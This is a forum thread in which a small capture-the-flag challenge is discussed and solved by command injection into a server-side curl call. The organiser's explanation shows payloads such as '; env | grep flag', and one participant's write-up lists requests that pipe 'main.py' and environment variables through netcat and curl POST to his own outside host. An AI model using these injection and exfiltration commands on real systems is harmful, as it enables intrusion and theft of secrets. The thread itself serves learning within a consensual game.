ATs Capture The Flag

NFlex23

This is very confusing, as I know almost nothing about vulnerabilities.

ScolderCreations

Congrats!

Chiroyce

now shall i release an explanation for this or should i wait for more people to complete?

i shutdown the server temporality - will be back up if you ask

Last edited by Chiroyce (March 19, 2022 14:32:24)

NFlex23

Chiroyce wrote:
(#103)
now shall i release an explanation for this or should i wait for more people to complete?

i shutdown the server temporality - will be back up if you ask

An explanation would be cool– I had no idea what I was doing, though I did know it had something to do with exploiting the remote command execution of curl.

scratchusername40

Chiroyce wrote:
(#99)
scratchusername40 has exploited the vuln but hasn't found the flag, congrats on that at least!!

(i got to know you from my logs -> found your repl )

Yooooo! I was so close

Chiroyce wrote:
(#100)
Retr0id wrote:
btw I started a bit late, about 8 minutes ago.
AND Retr0id WINS THE COMPETITION!! They found the flag!!!

whew that was intense!! but you found it!!

Nice job

Chiroyce wrote:
(#103)
now shall i release an explanation for this or should i wait for more people to complete?

i shutdown the server temporality - will be back up if you ask

Explanation please
Or even better open the server

Last edited by scratchusername40 (March 19, 2022 14:36:22)

Retr0id

I'd like to do a quick writeup on how I figured out what the vulnerability was, and what the exploit was.

But I'll wait until the competition is fully over first, ideally other people should still get a chance to solve it.

scratchusername40

Retr0id wrote:
(#106)
I'd like to do a quick writeup on how I figured out what the vulnerability was, and what the exploit was.

But I'll wait until the competition is fully over first, ideally other people should still get a chance to solve it.

well he took the server down so we can't do anything

Chiroyce

Source code - here
Explanation —

whenever you pressed submit, your input would send a request to the backend like this

https://my-repls-url.rep.co/fetch?domain={YOUR_INPUT}

I used “fetch” to confuse you, it actually used curl on the server

when the server receives the request, it executes the input in the shell (as user input, aka the url is allowed, this is where the vulnerability is, NEVER trust user input directly into the server's shell)

curl {your-url-here}

once you figure this out, you may think that there is no way to actually run your own code, but in bash, you can use a semicolon ; or use && to run two commands, so when it runs in the server, it looks like this
your input: ; echo “malicious code!!”
how it's executed

curl ; echo "malicious code!!"

your input: && echo “malicious code!!”
how it's executed

curl && echo "malicious code!!"

this is referred to as Remote Code Execution (RCE), it basically means running code on a machine that is not physically close to you.

now the flag, was actually not even that hardly hidden. it was literally there in an environment variable called flag lol
so you could do this if you didnt know what the variable's name was

; env # this will return all environment variables

or to find it specifically

; env | grep flag # this will return all lines with the word "flag"

thats it! any doubts?

i'll leave the server on for a while

Last edited by Chiroyce (March 19, 2022 14:45:11)

NFlex23

That what I was doing, but I never thought of looking in the environmental variables. Good game!

mybearworld

Chiroyce wrote:
Retr0id wrote:
btw I started a bit late, about 8 minutes ago.
AND Retr0id WINS THE COMPETITION!! They found the flag!!!

whew that was intense!! but you found it!!

now shall i release an explanation for this or should i wait for more people to complete?

I'd love to find it too, but i couldn't… xD
That's really easy in hindsight, I did that too first, with echo, but i got an error

Last edited by mybearworld (March 19, 2022 14:49:00)

Chiroyce

mybearworld wrote:
I'd love to find it too, but i couldn't… xD

not a problem at all - you simply weren't experienced with vulnerabilities (neither am i, i just thought this would be fine) - you can always learn from this and try it out yourself now

mybearworld

I'll do that when I'm back at my computer!

Chiroyce

Also can I know who was the one sending requests which contained the API URL of a social media site made by jeffalo? Was it jeffalo himself or someone else? im just curious

Last edited by Chiroyce (March 19, 2022 14:56:05)

scratchusername40

Chiroyce wrote:
(#108)
Source code - here
Explanation —

whenever you pressed submit, your input would send a request to the backend like this
https://my-repls-url.rep.co/fetch?domain={YOUR_INPUT}
I used “fetch” to confuse you, it actually used curl on the server

when the server receives the request, it executes the input in the shell (as user input, aka the url is allowed, this is where the vulnerability is, NEVER trust user input directly into the server's shell)
curl {your-url-here}
once you figure this out, you may think that there is no way to actually run your own code, but in bash, you can use a semicolon ; or use && to run two commands, so when it runs in the server, it looks like this
your input: ; echo “malicious code!!”
how it's executed
curl ; echo "malicious code!!"
your input: && echo “malicious code!!”
how it's executed
curl && echo "malicious code!!"
this is referred to as Remote Code Execution (RCE), it basically means running code on a machine that is not physically close to you.

now the flag, was actually not even that hardly hidden. it was literally there in an environment variable called flag lol
so you could do this if you didnt know what the variable's name was
; env # this will return all environment variables
or to find it specifically
; env | grep flag # this will return all lines with the word "flag"
thats it! any doubts?

i'll leave the server on for a while

i knew it was curl, and I had it to where I could do arbitrary code in the shell (kinda a vuln in itself right there) but I don't know how to use bash so i couldn't find the env var.

Also did you finish this 8 months ago??

mybearworld

Well finding out it was curl was easy, just put something invalid

Chiroyce

scratchusername40 wrote:
Also did you finish this 8 months ago??

It was an old repl repurposed for this so that i don't expose the URL to people who know me on replit

mybearworld wrote:
Well finding out it was curl was easy, just put something invalid

yeah, i made that on purpose thinking that it would guide the participants in the right direction

scratchusername40 wrote:
i knew it was curl, and I had it to where I could do arbitrary code in the shell (kinda a vuln in itself right there) but I don't know how to use bash so i couldn't find the env var.

yeah, you need to exploit that vuln to find the flag, instead of creating it like you did

Last edited by Chiroyce (March 19, 2022 14:57:44)

Retr0id

Chiroyce wrote:
Source code - here
Explanation —

I'll just add some notes on how I went about solving it.

First thing I did was open my browser dev console so I could watch the network requests. Here's the full list of requests I made during solving the challenge:

1. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=example.com
2. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app:31337
3. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app:31337/$(id)
4. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app:31337/$(ls)
5. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app:31337/$(cat main.py)
6. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app/$(cat main.py|nc nxloader.app 31337)
7. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app; curl nxloader.app:31337/lol
8. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app; cat main.py|curl -X POST --data-binary @- nxloader.app:31337/lol
9. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app; env|curl -X POST --data-binary @- nxloader.app:31337/lol

1. This was just a check to see how the app worked - of course, it showed me the contents of example.com.

2. This was a request I made to my own domain (nxloader.app), so I could inspect the request headers. This is what I saw on my server, using netcat to receive the raw TCP data:

$ nc -lvp 31337
Listening on 0.0.0.0 31337
Connection received on 6.114.123.34.bc.googleusercontent.com 59892
GET / HTTP/1.1
Host: nxloader.app:31337
User-Agent: curl/7.58.0
Accept: */*

The “curl” useragent immediately indicated to me that the curl shell command probably being used to make the request, so then I knew to try command injection.

3. I tried injecting the “id” command using bash command substituion syntax. This is what I saw on my server:

$ nc -lvp 31337
Listening on 0.0.0.0 31337
Connection received on 6.114.123.34.bc.googleusercontent.com 59894
GET /uid=1000(runner) HTTP/1.1
Host: nxloader.app:31337
User-Agent: curl/7.58.0
Accept: */*

It worked! Although, “uid=1000(runner)” is only the first part of the output, it's not giving me anything after the space. This would cause me some trouble later…

4. I injected the “ls” command using the same trick, and it responded with “main.py”. I was hoping for a “flag.txt”, so I had to keep looking.

5. I tried dumping main.py so I could have a look, however it only responded with the first word, which happened to be “from”. I needed to improve my data exfiltration method to work with data including spaces…

6. I tried piping a command into netcat, but it didn't work - perhaps netcat was not installed in the server.

7. I switched to using a semicolon to seperate my command, this was just a check to see if it would work. It did!

8. I piped the result of “cat main.py” into a curl POST request, which successfully POSTed the entire file contents to my server. It worked, and now I had the challenge source code, but unfortunately for me the flag was not there.

9. I piped the result of the “env” command into a curl POST request, which also worked. Environment variables often include juicy data, like flags, so I read through them all - and then I saw the flag!

Last edited by Retr0id (March 19, 2022 15:03:49)

mybearworld

Did it work?

Chiroyce

Retr0id wrote:
6. I tried piping a command into netcat, but it didn't work - perhaps netcat was not installed in the server.

Replit's repls dont have netcat.

Retr0id wrote:
9. I piped the result of the “env” command into a curl POST request, which also worked. Environment variables often include juicy data, like flags, so I read through them all - and then I saw the flag!

Nice!!

Retr0id wrote:
2. This was a request I made to my own domain (nxloader.app), so I could inspect the request headers. This is what I saw on my server, using netcat to receive the raw TCP data:

That seemed a bit overkill lol

kccuber

i missed it due to some timezone confusion lol

Discuss Scratch